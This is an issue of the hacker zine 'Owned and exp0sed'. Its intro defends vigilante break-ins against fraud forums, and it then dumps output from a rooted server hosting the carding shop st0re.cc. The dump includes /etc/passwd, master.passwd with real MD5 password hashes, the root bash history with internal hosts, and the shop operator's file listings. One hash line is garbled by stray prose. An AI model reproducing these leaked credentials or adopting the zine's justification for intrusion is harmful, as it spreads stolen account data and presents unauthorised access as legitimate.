`---' | | +| |------------------' | | | |----------------------' +\ | .---. | h | \ | .---. + \ / / . \ | e | \ / / . \ + `---' |\_/| | | r | `---' |\_/| | + | | /| | e | | | /| + .-----------------------' | | | .---------------------------' | + / .-. | | | / .-. | +| / \ Zion-Network.net | | t | | / \ Some leftovers | +| |\_. | Hackbase.cc | | o | | |\_. | Outro | +|\| | /| | | | |\| | /| | +| `---' | | | | | `---' | | +| |------------------' | r | | |----------------------' +\ | | m | \ | + \ / | | \ / + `---' | /\ | `---' + :\______|/ \|______/: + \__0day______0day__/ + | /\ | + || || + || || + || || + || || + | \/ | + \____/ + (____) + +First of all, here is the verification of the sha1 hash we published +when hba-crew got owned: 49bd4433fff1b04530dcaff1f52fa971ff895871 = +sha1(HAPPY_NINJAS_ARE_STAYING_HAPPY_exp03) + + ,;~;, + /\_ + ( / + (() //) + | \\ ,,;;'\ + __ _( )m=((((((((((((((========={ Intro }=========------- + /' ' '()/~' '.(, | + ,;( )|| | ~ Tonight's the night. And it's going to happen, +,;' \ /-(.;, ) again and again. It has to happen. + ) / ) / + // || We all want to welcome you to a brand new issue + )_\ )_\ of Owned and exp0sed! Before we get to the fun +part, we'd just like to clarify some things since there has been a lot +going on on the internet since our last issue. + +Movements, as they put it, like Anonymous or the short-lived +phenomenon of Lulzsec have gotten an increasingly important topic to +media and the public. We want to line out our motivation in contrast +to theirs. Anonymous has tried to gain as much media attention as +possible by inflicting the most damage possible on big companies and +service providers. Similarily, Lulzsec have attacked various websites +and published an enormous amount of information. + +However, while it's their goal to put up pressure on governments and +big organizations, it's ours to protect the public from the abysses of +the internet. Fraud is our main concern and we intent to contain it as +much as possible. While Anon and Lulzsec toss out their stuff within +weeks, we take our time to gain access, collect data and aggregate it +nicely for you, our readers. This is why there is a substantial +time span between our releases. + +We of course also monitor the German and international fraud scene as +it recovers from our attacks; it's hard to stop something that is +driven by selfishness, greed and money. We also find it worrying that +Anonymous and especially Lulzsec act in what they call "Operation +Antisec". The original Antisec Movement was brought to life by actual +hackers and targeted full disclosure and the corporate security +industry. Publishing gigantic amounts of (corporate) data on the +internet does exactly the opposite: It provides the security industry +with the attention they need and hence new customers. + +But let's now look at why we are here today. "Money is the root of all +evil" as the proverb has it; and it's why fraud communities do come +back after we have owned and exposed them; but as long as they carry +on, we do, too. Fraudsters ought to know that they're not safe because +we are going to hunt down every single site that is left. We +experience the fraud scene scattering wider and wider after every +issue we have published; new boards, and with them new admins, emerge +out of nowhere. That just shows well again how stubborn fraudsters are +as most of them still refuse to accept that they lost their right to +exist on the internet. It's particularly frustrating that they don't +seem to draw lessons from getting owned again and again. + +That being said we can just strongly advise you to spend your time on +something worthwhile. It's not too late ... + ,;~;, + _/\ + \ ) + (\\ ()) + /';;,, // | +-------========={ St0re.cc }==========))))))))))))))=m( )_ __ + | ,(.' '~/()' ' '\ +Let's head to our first target. Fraud or scene ~ | ||( );, +shops in general have not been our main concern. ( ,;.)-\ / ';, +During our many break-ins in other fraud \ ( \ ( +communities, we often were dazzled with glaring || \\ +banners of underground markets where you could buy /_( /_( +"fresh" CCs, PayPal accounts or socks5 proxies to stay "secure" while +carding. So by now we got the hint that it might be worth finding out +out how often and by whom these shops were really used. It's quite +impressive how much money you can make by simply stealing PayPal +accounts with a RAT and not using it for fraud but for selling it to +scammers instead. That's why we clicked on the first banner we saw and +concluded that it would be a noble action to root. We actually got +pretty lucky since st0re.cc was not the only credit card store on that +server. We spotted some others like the infamous El-Basar.biz (it was +already shown in a German tv show), the rest is not worth to mention. +Anyway this is what you get if you decide to buy credit cards in a +webshop: You will get owned and exposed. Like always. + +# uname -a +FreeBSD 6.4-RELEASE-p11 i386 i386 SMP-GENERIC + +# id +uid=0(root) gid=0(wheel) groups=0(wheel),5(operator) + +# cat /etc/passwd +# $FreeBSD: src/etc/master.passwd,v 1.40 2005/06/06 20:19:56 brooks Exp $ +# +root:*:0:0:Charlie &:/root:/usr/local/bin/bash +toor:*:0:0:Bourne-again Superuser:/root: +daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin +operator:*:2:5:System &:/:/usr/sbin/nologin +bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin +tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin +kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin +games:*:7:13:Games pseudo-user:/usr/games:/usr/sbin/nologin +news:*:8:8:News Subsystem:/:/usr/sbin/nologin +man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin +sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin +smmsp:*:25:25:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin +mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin +bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin +proxy:*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin +_pflogd:*:64:64:pflogd privsep user:/var/empty:/usr/sbin/nologin +_dhcp:*:65:65:dhcp programs:/var/empty:/usr/sbin/nologin +uucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico +pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin +www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin +nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin +mysql:*:88:88:MySQL Daemon:/nonexistent:/sbin/nologin +postfix:*:125:125:Postfix Mail System:/var/spool/postfix:/usr/sbin/nologin +cyrus:*:60:60:the cyrus mail server:/nonexistent:/usr/sbin/nologin +nukeuploads:*:1001:1001:User &:/home/nukeuploads:/bin/sh +ayoga:*:1002:1002:User &:/home/ayoga:/sbin/nologin +alg:*:1004:1004:User &:/home/alg:/bin/sh +propiska:*:1005:1005:User &:/home/propiska:/sbin/nologin +msk:*:1007:1007:User &:/home/msk:/sbin/nologin +vestacomp:*:1006:1006:User &:/home/vestacomp:/sbin/nologin +crank2010:*:1016:1016:User &:/home/crank2010:/sbin/nologin +lordknight:*:1019:1019:User &:/home/lordknight:/bin/sh +madrage:*:1003:1003:User &:/home/madrage:/bin/sh +scenehack:*:1008:1008:User &:/home/scenehack:/sbin/nologin +thefuelru:*:1009:1009:User &:/home/thefuelru:/sbin/nologin +mr101:*:1021:1021:User &:/home/mr101:/bin/sh +szenevz:*:1011:1011:User &:/home/szenevz:/sbin/nologin +exchanger:*:1012:1012:User &:/home/exchanger:/bin/sh +filip:*:1023:1023:User &:/home/filip:/sbin/nologin +mmgen:*:1018:1018:User &:/home/mmgen:/sbin/nologin +ganymedes:*:1024:1024:User &:/home/ganymedes:/sbin/nologin +garf:*:1031:1031:User &:/home/garf:/sbin/nologin +onlineschauen:*:1013:1013:User &:/home/onlineschauen:/bin/sh +snetwork:*:1022:1022:User &:/home/snetwork:/sbin/nologin +useresu:*:1010:1010:User &:/home/useresu:/sbin/nologin +useresu1:*:1026:1026:User &:/home/useresu1:/sbin/nologin +margosha:*:1020:1020:User &:/home/margosha:/sbin/nologin +pavlrse:*:1027:1027:User &:/home/pavlrse:/sbin/nologin +muraaat:*:1000:1000:User &:/home/muraaat:/sbin/nologin +test4me:*:1014:1014:User &:/home/test4me:/bin/sh + +# cat /etc/master.passwd +# $FreeBSD: src/etc/master.passwd,v 1.40 2005/06/06 20:19:56 brooks Exp $ +# +root:*:0:0::0:0:Charlie &:/root:/usr/local/bin/bash +toor:*:0:0::0:0:Bourne-again Superuser:/root: +daemon:*:1:1::0:0:Owner of many system processes:/root:/usr/sbin/nologin +operator:*:2:5::0:0:System &:/:/usr/sbin/nologin +bin:*:3:7::0:0:Binaries Commands and Source:/:/usr/sbin/nologin +tty:*:4:65533::0:0:Tty Sandbox:/:/usr/sbin/nologin +kmem:*:5:65533::0:0:KMem Sandbox:/:/usr/sbin/nologin +games:*:7:13::0:0:Games pseudo-user:/usr/games:/usr/sbin/nologin +news:*:8:8::0:0:News Subsystem:/:/usr/sbin/nologin +man:*:9:9::0:0:Mister Man Pages:/usr/share/man:/usr/sbin/nologin +sshd:*:22:22::0:0:Secure Shell Daemon:/var/empty:/usr/sbin/nologin +smmsp:*:25:25::0:0:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin +mailnull:*:26:26::0:0:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin +bind:*:53:53::0:0:Bind Sandbox:/:/usr/sbin/nologin +proxy:*:62:62::0:0:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin +_pflogd:*:64:64::0:0:pflogd privsep user:/var/empty:/usr/sbin/nologin +_dhcp:*:65:65::0:0:dhcp programs:/var/empty:/usr/sbin/nologin +uucp:*:66:66::0:0:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico +pop:*:68:6::0:0:Post Office Owner:/nonexistent:/usr/sbin/nologin +www:*:80:80::0:0:World Wide Web Owner:/nonexistent:/usr/sbin/nologin +nobody:*:65534:65534::0:0:Unprivileged user:/nonexistent:/usr/sbin/nologin +mysql:*:88:88::0:0:MySQL Daemon:/nonexistent:/sbin/nologin +postfix:*:125:125::0:0:Postfix Mail System:/var/spool/postfix:/usr/sbin/nologin +cyrus:*:60:60::1172782800:0:the cyrus mail server:/nonexistent:/usr/sbin/nologin +nukeuploads:$1$hO28fqpU$OL/RovJhduUxEqR3kBawe.:1001:1001::0:0:User &:/home/nukeuploads:/bin/sh +ayoga:$1$CNCuqfrs$p7QpuHI6jagkVUyvGO5MI.:1002:1002::0:0:User &:/home/ayoga:/sbin/nologin +alg:$1$A07..akS$.TPW7o0ZCO25bB6AltS/Q.:1004:1004::0:0:User &:/home/alg:/bin/sh +propiska:$1$Hgb0peXw$2wtRLXytI9Mmwbsxi/RAI.:1005:1005::0:0:User &:/home/propiska:/sbin/nologin +msk:$1$yqxdalvS$IPYorMt8h.pMqc3V8mdED0:1007:1007::0:0:User &:/home/msk:/sbin/nologin +vestacomp:$1$bL6RZJ2K$f7CTWRj.ps2Q9XuImy4sI1:1006:1006::0:0:User &:/home/vestacomp:/sbin/nologin +crank2010:*:1016:1016::0:0:User &:/home/crank2010:/sbin/nologin +lordknight:*:1019:1019::0:0:User &:/home/lordknight:/binbreak-ins in other fraud/sh +madrage:*:1003:1003::0:0:User &:/home/madrage:/bin/sh +scenehack:*:1008:1008::0:0:User &:/home/scenehack:/sbin/nologin +thefuelru:*:1009:1009::0:0:User &:/home/thefuelru:/sbin/nologin +mr101:*:1021:1021::0:0:User &:/home/mr101:/bin/sh +szenevz:*:1011:1011::0:0:User &:/home/szenevz:/sbin/nologin +exchanger:*:1012:1012::0:0:User &:/home/exchanger:/bin/sh +filip:$1$asb5GyOE$OHPPapNFMf6zKA5FvrIpE/:1023:1023::0:0:User &:/home/filip:/sbin/nologin +mmgen:$1$bnXQT0ng$obWjcBQFTBTKk83ElXfDt0:1018:1018::0:0:User &:/home/mmgen:/sbin/nologin +ganymedes:$1$95EongK1$fFPWI1ePR8VKBIAQ/LwUu0:1024:1024::0:0:User &:/home/ganymedes:/sbin/nologin +garf:$1$xzEPVuNH$26jps1eOPu2hNObvlcgkH0:1031:1031::0:0:User &:/home/garf:/sbin/nologin +onlineschauen:$1$RihNUTco$hzbht5CwvI/h3X0cGe8T91:1013:1013::0:0:User &:/home/onlineschauen:/bin/sh +snetwork:$1$y0T7yJX4$ER.mYpG3P21qlz3qgQWtN.:1022:1022::0:0:User &:/home/snetwork:/sbin/nologin +useresu:$1$6J5xPk5F$sfpn5pAKTlf10hX3kSKkv.:1010:1010::0:0:User &:/home/useresu:/sbin/nologin +useresu1:$1$gPsMDoWO$.Ve9Z8tEQLZrlF7MrP6ZH1:1026:1026::0:0:User &:/home/useresu1:/sbin/nologin +margosha:*:1020:1020::0:0:User &:/home/margosha:/sbin/nologin +pavlrse:$1$AKfcvELm$oImAlQWKKDaEd.dimM6wY/:1027:1027::0:0:User &:/home/pavlrse:/sbin/nologin +muraaat:*:1000:1000::0:0:User &:/home/muraaat:/sbin/nologin +test4me:$1$nNH.D3yA$2KQeYLwqG3TcFHOc9toFL0:1014:1014::0:0:User &:/home/test4me:/bin/sh + +# pwd +/root + +# ls -la +total 715748 +drwxr-xr-x 4 root wheel 512 Sep 9 04:43 . +drwx--x--x 18 root wheel 512 Apr 12 19:59 .. +-rw------- 1 root wheel 10017 Sep 26 02:59 .bash_history +-rw------- 1 root wheel 67 Sep 9 17:00 .cvspass +-rw------- 1 root wheel 50 Feb 9 2011 .lesshst +drwxr-xr-x 3 root wheel 512 Sep 26 02:57 .mc +-rw------- 1 root wheel 1344 May 20 03:24 .mysql_history +drwx------ 2 root wheel 512 Aug 14 19:22 .ssh +-rwxr-xr-x 1 root wheel 241 Jul 21 00:11 addban.sh +-rw-r--r-- 1 root wheel 601437 Apr 12 17:56 apache.log +-rwxr-xr-x 1 root wheel 89 Mar 6 2010 apache_watchdog.php +-rwxr-xr-x 1 root wheel 4184 Feb 2 2011 mydumpsplitter.sh +-rwxr-xr-x 1 alg www 365607550 Feb 1 2011 zzz.sql + +# cat .bash_history +apachectl restart +exit +tail -f /var/log/httpd/httpd_access.log +tail -f /var/log/httpd/httpd_access.log +/usr/local/etc/rc.d/apache22 restart +top -S +tail -f /var/log/httpd/httpd_access.log +/usr/local/etc/rc.d/apache22 restart +/usr/local/etc/rc.d/apache22 restart +/usr/local/etc/rc.d/apache22 restart +cd /home/alg/ +mc +mysql -u root -p`cat /etc/my.passwd ` +cd db_split/ +mysql -u root -p`cat /etc/my.passwd` --default-character-set=utf8 -f alg_forum < postindex.sql +ls -la +mcedit postindex.sql +mysql -u root -p`cat /etc/my.passwd` --default-character-set=utf8 -f alg_forum < adminlog.sql +mysql -u root -p`cat /etc/my.passwd` --default-character-set=utf8 -f alg_forum < attachment.sql +top +cd .. +wget +wget http://platon.sk/cvs/cvs.php/___checkout___/scripts/perl/mysql/mysqldump-convert.pl?rev=1.5&content-type=text/plain mysqldump-convert.pl +mc +ls +mcedit mysqldump-convert.pl\?rev\=1.5 +mc +cat db_split/postindex.sql | ./mysqldump-convert.pl > postindex.sql +mcedti postindex.sql +mcedit postindex.sql +mcedit mysqldump-convert.pl +mysql -u root -p`cat /etc/my.passwd` --default-character-set=utf8 -f alg_forum < postindex.sql +exit +mc +/usr/local/etc/rc.d/apache22 restart +top +mc +date +exit +mc +cd /home/nukeuploads/nukeuploads.com/ +chown nukeuploads:nukeuploads google4973efd9f5db5c16.html +mc +apachectl restart +uptime +top +tail -n 1000 /var/log/httpd/httpd_access.log +ps aux | grep nginx +mc +exit +apachectl stop +uptime +uptime +uptime +uptime +uptime +top +apachectl start +exit +tail -n 1000 /var/log/httpd/httpd_access.log +exit +top +apachectl restart +top +tail -n 1000 /var/log/httpd/httpd_access.log +tail -n 1000 /var/log/httpd/httpd_access.log +exit +apachectl restart +top +exit +tail -f /var/log/httpd/httpd_access.log +apachectl stop +killall -9 httpd +apachectl start +tail -f /var/log/httpd/httpd_access.log +ps ax|grep -c http +ps ax|grep -c http +ps ax|grep -c http +ps ax|grep -c http +ps ax|grep -c http +ps ax|grep -c http +mc -d +ps ax|grep -c http +ps ax|grep -c http +ps ax|grep -c http +ps ax|grep -c http +top +ps ax|grep -c http +ps ax|grep -c http +ps ax|grep -c http +ps ax|grep -c http +ps ax|grep -c http +ps ax|grep -c http +ps ax|grep -c http +ps ax|grep -c http +top +top +uptime +uptime +uptime +uptime +uptime +uptime +top +cd /home/kirbysho/ +mc +uptime +uptime +uptime +mcedit /usr/local/etc/apache22/vhosts/kirbysho.conf +apachectl restart +top +mc +mcedit /usr/local/etc/apache22/vhosts/kirbysho.conf +apachectl restart +uptime +uptime +uptime +uptime +uptime +uptime +top +tail -n 100 /var/log/httpd/httpd_access.log +uptime +uptime +uptime +uptime +top +exit +apachectl restart +exit +tail -f /var/log/httpd/httpd_access.log +killall -9 httpd +apachectl restart +top +tail -f /var/log/httpd/httpd_access.log +tail -f /var/log/httpd/httpd_access.log +tail -f /var/log/httpd/httpd_access.log |grep kirby-shop.ru +mc -d +date +date +date +date +date +date +date +date +killall -9 httpd +apachectl start +tail -f /var/log/httpd/httpd_access.log +tail -f /var/log/httpd/httpd_access.log |grep kirby-shop.ru +tail -n 10000 /var/log/httpd/httpd_access.log | grep "russian-elite" > /root/apache.log +mc +killall -9 httpd +apachectl start +top +tail -f /var/log/httpd/httpd_access.log |grep kirby-shop.ru +killall -9 httpd +apachectl start +tail -f /var/log/httpd/httpd_access.log |grep kirby-shop.ru +cat /var/log/httpd/httpd_access.log | grep kirby-shop.ru > /var/log/httpd_kirby.log +cat /var/log/httpd/httpd_access.log +cat/var/log/httpd_kirby.log +cp /var/log/httpd_kirby.log +cp /var/log/httpd_kirby.log /home/kirbysho/ +ls /home/kirbysho/ +exit +tail -f /var/log/httpd/httpd_access.log +tail -f /var/log/httpd/httpd_access.log +top +top +ps ax +tail -f /var/log//httpd/httpd_access.log +tail -f /var/log//httpd/httpd_access.log +ps ax +top +ls -l +ping ya.ru +ping google.com +exit +mc +tail -f /var/log/httpd/httpd_access.log +mc +mc +mysql -unukeuploads_gla -p -h db.nukeuploads.com nukeuploads_gla +mysql -unukeuploads_gla -p -h +mysql -unukeuploads_gla -p -h +mysql -unukeuploads_gla -p -h 92.241.164.71 nukeuploads_gla +mc +nslookup +mc +nslookup +tail -n 1000 /var/log/httpd/httpd_access.log +exit +tail -n 1000 /var/log/httpd/httpd_access.log +top +exit +tail -f /var/log/httpd/httpd_access.log +tail -f /var/log/httpd/httpd_access.log +tail -f /var/log/httpd/httpd_access.log +tail -n 1000 /var/log/httpd/httpd_access.log +exit +tail -n 100 /var/log/httpd/httpd_access.log +tail -n 100 /var/log/httpd/httpd_access.log | grep russian | wc -l +exit +tail -f /var/log/httpd/httpd_access.log +touch ~/addban.sh +chmod +x ~/addban.sh +mcedit ~/addban.sh +tail -n 100 /world/sec1005/var/log/httpd/httpd_access.log | grep 'swissfaking.net' | awk '{print }' | sort | uniq -c | sort -n | awk '{if ($1>3) print $2}' +/usr/local/etc/rc.d/apache22 restart +/usr/local/etc/rc.d/apache22 restart +tail -f /var/log/httpd/httpd_access.log +tail -f /var/log/httpd/httpd_access.log +/usr/local/etc/rc.d/nginx status +tail -f /var/log/httpd/httpd_access.log +tail -f /var/log/httpd/httpd_access.log +tail -f /var/log/httpd/httpd_access.log +tcpdump -nn host 187.160.244.66 +tcpdump -nni bge0 host 187.160.244.66 +tcpdump -nni bge0 host 187.160.244.66 +sort /var/log/httpd/httpd_load.log | awk '{print $1}' | uniq -c +mc +mc -d +php -V +php -v +mysql -v +mysql -V +top +mc +ls -la +cd /home/margosha/ +ls -la +pwd +mc +killall -9 mc +ls -la +cd forum.la2amadis.ru/ +ls -la +cd .. +ls -la +chown -cRv margosha:www ./* +chown -cRv margosha:www ./* +chown -cR margosha:www ./* +chown -R margosha:www ./* +ls -la +cd forum.la2amadis.ru/ +ls -la +cd .. +ls -la +cd la2amadis.ru/ +ls -la +mc +ps ax +w +ps axu +ps axu +tail -f /var/log/httpd/httpd_access.log +exit +ps wauxf +cat /proc/22623/cmdline +kill -9 22623 +ps wauxf +df -h +cd /home/toco123/ +ls -la +cd 00/ +ls -la +mc +killall -9 mc +ps wauxf +df -h +ls /tmp +ls -la +ls -la /tmp/ +ps wauxf +df -h +w +cd / +ls -la +cat /etc/fsta +ps wauxf +kill -9 22623 +cd /tmp/ +ls -la +rm a.* +ls -la +tail -f /var/log/httpd/httpd_access.log +w +ps wauxf +ifconfig +cd /home/ +ls -la +mc +cd /home/margosha/ +tar czfv backup.tgz forum.la2amadis.ru la2amadis.ru +mc +chown margosha:www backup.tgz +mc +php -v +cd /usr/ports/mail/php-imap +cd /usr/ports/ +cd ./mail +ls |grep imap +cd php5-imap +make install clean +cd /usr/local/etc/ +ls +mc +mc +cd /usr/ports/mail/php52-imap +make install clean +cd /usr/ports/mail/php5-imap +make install clean +portdowngrade -s :pserver:anoncvs@anoncvs.tw.FreeBSD.org:/home/ncvs lang/php5 +cd /usr/ports/mail/php52-imap +portdowngrade -s :pserver:anoncvs@anoncvs.tw.FreeBSD.org:/home/ncvs lang/php5 +cd /usr/ports/ports-mgmt/portdowngrade +make install clean +make install clean +cd /usr/ports/mail/php5-imap +portdowngrade -s :pserver:anoncvs@anoncvs.tw.FreeBSD.org:/home/ncvs lang/php5 +cd /usr/ports/mail/php5-imap +portdowngrade -s :pserver:anoncvs@anoncvs.tw.FreeBSD.org:/home/ncvs lang/php5 +php -m +whereis portdowngrade +cd /usr/ports/ports-mgmt/portdowngrade +make install clean +cd /usr/ports/devel/popt +make install clean +cd /usr/ports/devel/libtool22 +make install clean +cd - +make install clean +uname -a +php -v +cd /usr/ports/lang/php52-extensions/ +make config +make +cd ../php5-extensions/ +make config +make +php -v +portdowngrade -s :pserver:anoncvs@anoncvs.tw.FreeBSD.org:/home/ncvs lang/php5 +touch /root/.cvspass +portdowngrade -s :pserver:anoncvs@anoncvs.tw.FreeBSD.org:/home/ncvs lang/php5 +php -v +portdowngrade -s :pserver:anoncvs@anoncvs.fi.FreeBSD.org:/home/ncvs lang/php5 +portdowngrade -s :pserver:anoncvs@anoncvs.fi.FreeBSD.org:/home/ncvs lang/php5 +portdowngrade -s :pserver:anoncvs@anoncvs.tw.FreeBSD.org:/home/ncvs lang/php5 +portdowngrade -s :pserver:anoncvs@anoncvs.at.FreeBSD.org:/home/ncvs lang/php5 +portdowngrade -s :pserver:anoncvs.at.FreeBSD.org:/home/ncvs lang/php5 -o anoncvs +portdowngrade -o anoncvs -s :pserver:anoncvs.at.FreeBSD.org:/home/ncvs lang/php5 +portdowngrade -o=anoncvs -s :pserver:anoncvs.at.FreeBSD.org:/home/ncvs lang/php5 +portdowngrade -o anoncvs -s :pserver:anoncvs.at.FreeBSD.org:/home/ncvs lang/php5 +portdowngrade -s :pserver:anoncvs@anoncvs.manov.su:/home/ncvs lang/php5 +portdowngrade -s :pserver:anoncvs@anoncvs.manov.su:/home/ncvs lang/php5 +portdowngrade -s :pserver:anoncvs@anoncvs.manov.su:/home/ncvs lang/php5 +server_args = -f --allow-root=/test pserver +cat /etc/inetd.conf +cat /etc/inetd.conf | grep allow +portdowngrade -s :pserver:anoncvs@cvsup13.tw.freebsd.org:/home/ncvs lang/php5 +portdowngrade -s :pserver:cvsup13.tw.freebsd.org:/home/ncvs lang/php5 +portdowngrade -s :pserver:anoncvs@anoncvs1.FreeBSD.org:/home/ncvs lang/php5 +portdowngrade -s :pserver:anoncvs@cvsup13.fr.freebsd.org:/home/ncvs lang/php5 +mc +php -v | grep imap +php -m | grep imap +portdowngrade -s :pserver:anoncvs@anoncvs1.FreeBSD.org:/home/ncvs lang/php5 +portdowngrade -s :pserver:anoncvs@anoncvs2.FreeBSD.org:/home/ncvs lang/php5 +php -v +portdowngrade lang/php5 +portdowngrade -s :pserver:anoncvs@anoncvs1.FreeBSD.org:/home/ncvs lang/php5 +portdowngrade -s :pserver:anoncvs@anoncvs.at.FreeBSD.org:/home/ncv lang/php5 +portdowngrade -s :pserver:anoncvs@anoncvs.at.FreeBSD.org:/home/ncvs lang/php5 +portdowngrade -s :pserver:anoncvs@anoncvs.de.FreeBSD.org:/home/ncvs lang/php5 +portdowngrade -r -s :pserver:anoncvs@anoncvs.de.FreeBSD.org:/home/ncvs lang/php5 +portdowngrade -s :pserver:anoncvs@anoncvs.de.FreeBSD.org:/home/ncvs lang/php5 +portdowngrade -s :login:anoncvs@anoncvs.jp.FreeBSD.org:/home/ncvs lang/php5 +portdowngrade -s :pserver:anoncvs@anoncvs.jp.FreeBSD.org:/home/ncvs lang/php5 +portdowngrade -s :pserver:anoncvs@anoncvs.jp.FreeBSD.org:/home/ncvs lang/php5 +portdowngrade -s :pserver:anoncvs@anoncvs.jp.FreeBSD.org:/home/ncvs lang/php5 +portdowngrade -s ":pserver:anoncvs@anoncvs.jp.FreeBSD.org:/home/ncvs" lang/php5 +portdowngrade -s ":pserver:anoncvs@anoncvs.fr.FreeBSD.org:/home/ncvs" lang/php5 +portdowngrade -o -s ":pserver:anoncvs@anoncvs.fr.FreeBSD.org:/home/ncvs" lang/php5 +portdowngrade -o -s ":pserver:anoncvs@anoncvs.fr.FreeBSD.org:/home/ncvs" lang/php5 +cd /usr/ports/mail/php5-imap/ +make config +make +cd .. +cd .. +mc +cd distfiles/ +fetch http://downloads.php.net/ilia/php-5.2.5.tar.bz2 +cd .. +cd mail/php5-imap/ +make +make install +php -m +php -m | grep imap +ls /var/db/pkg/| grep extre +ls /var/db/pkg/| grep exte +ls +mc + +# cd /home/mmgen + +total 44 +drwxr-x--- 7 mmgen www 512 Jun 11 13:18 . +drwx--x--x 28 root wheel 1024 Sep 14 17:31 .. +drwxrwx--- 5 mmgen www 512 Jun 11 15:22 dodo.st0re.cc +drwxrwx--- 8 mmgen www 1024 Sep 30 16:19 st0re.cc +drwxrwx--- 3 mmgen www 512 Jan 26 2011 st0re.mmgen.st0re +drwxrwx--- 4 mmgen www 512 Dec 2 2010 st0re.morgen.w2c.ru +drwxrwx--- 2 mmgen www 10240 Oct 1 16:32 temp + +# cd dodo.st0re.cc + +# ls -la +total 96 +drwxrwx--- 5 mmgen www 512 Jun 11 15:22 . +drwxr-x--- 7 mmgen www 512 Jun 11 13:18 .. +drwxr-xr-x 2 mmgen www 512 Jun 11 15:21 css +drwxr-xr-x 4 mmgen www 2048 Jun 11 15:23 images +-rw-r--r-- 1 mmgen www 38106 Jun 11 15:23 index.html +drwxr-xr-x 2 mmgen www 512 Jun 11 15:21 js +# cd .. + +# cd st0re.mmgen.st0re + +# ls -la +total 16 +drwxrwx--- 3 mmgen www 512 Jan 26 2011 . +drwxr-x--- 7 mmgen www 512 Jun 11 13:18 .. +drwxr-xr-x 4 mmgen www 1536 Jan 26 2011 Neues Verzeichnis +-rw-r--r-- 1 mmgen www 1034 Dec 2 2010 index.html + +# cd "Neues Verzeichnis" + +# ls -la +total 237856 +drwxr-xr-x 4 mmgen www 1536 Jan 26 2011 . +drwxrwx--- 3 mmgen www 512 Jan 26 2011 .. +-rw-r--r-- 1 mmgen www 12326 Jan 26 2011 2.pl +-rw-r--r-- 1 mmgen www 3790 Jan 26 2011 2.png +-rw-r--r-- 1 mmgen www 697711 Jan 26 2011 22.png +-rw-r--r-- 1 mmgen www 164 Jan 26 2011 280539654158.kwm +-rw-r--r-- 1 mmgen www 1608 Jan 26 2011 280539654158.pwm +-rw-r--r-- 1 mmgen www 40882 Jan 26 2011 4.jpg +-rw-r--r-- 1 mmgen www 40505 Jan 26 2011 Banner4.jpg +-rw-r--r-- 1 mmgen www 1280 Jan 26 2011 Command Prompt.lnk +-rw-r--r-- 1 mmgen www 231 Jan 26 2011 Data.txt +-rw-r--r-- 1 mmgen www 900 Jan 26 2011 Daten.rtf +-rw-r--r-- 1 mmgen www 661429 Jan 26 2011 Enterpage.png +-rw-r--r-- 1 mmgen www 126738 Jan 26 2011 Enterpage_for_gamekings_eu_by_Frizzl3.jpg +-rw-r--r-- 1 mmgen www 1616155 Jan 26 2011 FILE0009.rar +-rw-r--r-- 1 mmgen www 952 Jan 26 2011 Fake Webcam (No Preview Mode).lnk +-rw-r--r-- 1 mmgen www 942 Jan 26 2011 Fake Webcam.lnk +-rw-r--r-- 1 mmgen www 1950 Jan 26 2011 FileZilla Client.lnk +-rw-r--r-- 1 mmgen www 1192 Jan 26 2011 Foxit Reader.lnk +-rw-r--r-- 1 mmgen www 10374720 Jan 26 2011 MasterCard-Abrechnung.psd +-rw-r--r-- 1 mmgen www 1889 Jan 26 2011 Mozilla Firefox.lnk +-rw-r--r-- 1 mmgen www 22207 Jan 26 2011 Neues Textdokument.txt +-rw-r--r-- 1 mmgen www 137 Jan 26 2011 PSN2.txt +drwxr-xr-x 2 mmgen www 512 Jan 26 2011 Pack_Pixel_Arrows_01 +drwxr-xr-x 2 mmgen www 512 Jan 26 2011 Packstation +-rw-r--r-- 1 mmgen www 38207488 Jan 26 2011 PhotoshopCS4Portable.rar +-rw-r--r-- 1 mmgen www 1139 Jan 26 2011 SQLRIP.lnk +-rw-r--r-- 1 mmgen www 1884 Jan 26 2011 SendBlaster.lnk +-rw-r--r-- 1 mmgen www 2505 Jan 26 2011 Skype.lnk +-rw-r--r-- 1 mmgen www 318050 Jan 26 2011 St0re.jpg +-rw-r--r-- 1 mmgen www 4574766 Jan 26 2011 St0re.psd +-rw-r--r-- 1 mmgen www 679964 Jan 26 2011 St0re2.jpg +-rw-r--r-- 1 mmgen www 24560317 Jan 26 2011 St0reinfo - Shopdesign2.psd +-rw-r--r-- 1 mmgen www 1124 Jan 26 2011 TeamViewer 6.lnk +-rw-r--r-- 1 mmgen www 917 Jan 26 2011 WebMoney Keeper Classic 3.9.3.1.lnk +-rw-r--r-- 1 mmgen www 40467 Jan 26 2011 Werbung.png +-rw-r--r-- 1 mmgen www 3821 Jan 26 2011 btn2.png +-rw-r--r-- 1 mmgen www 68286 Jan 26 2011 btn2.psd +-rw-r--r-- 1 mmgen www 748437 Jan 26 2011 exported data.txt +-rw-r--r-- 1 mmgen www 1179 Jan 26 2011 head.gif +-rw-r--r-- 1 mmgen www 1789314 Jan 26 2011 head.psd +-rw-r--r-- 1 mmgen www 2084608 Jan 26 2011 hinten.png +-rw-r--r-- 1 mmgen www 791 Jan 26 2011 new 2.txt +-rw-r--r-- 1 mmgen www 1133 Jan 26 2011 new 5.txt +-rw-r--r-- 1 mmgen www 528 Jan 26 2011 new 9.txt +-rw-r--r-- 1 mmgen www 3318 Jan 26 2011 passwords.txt +-rw-r--r-- 1 mmgen www 145044 Jan 26 2011 pp.rar +-rw-r--r-- 1 mmgen www 31694808 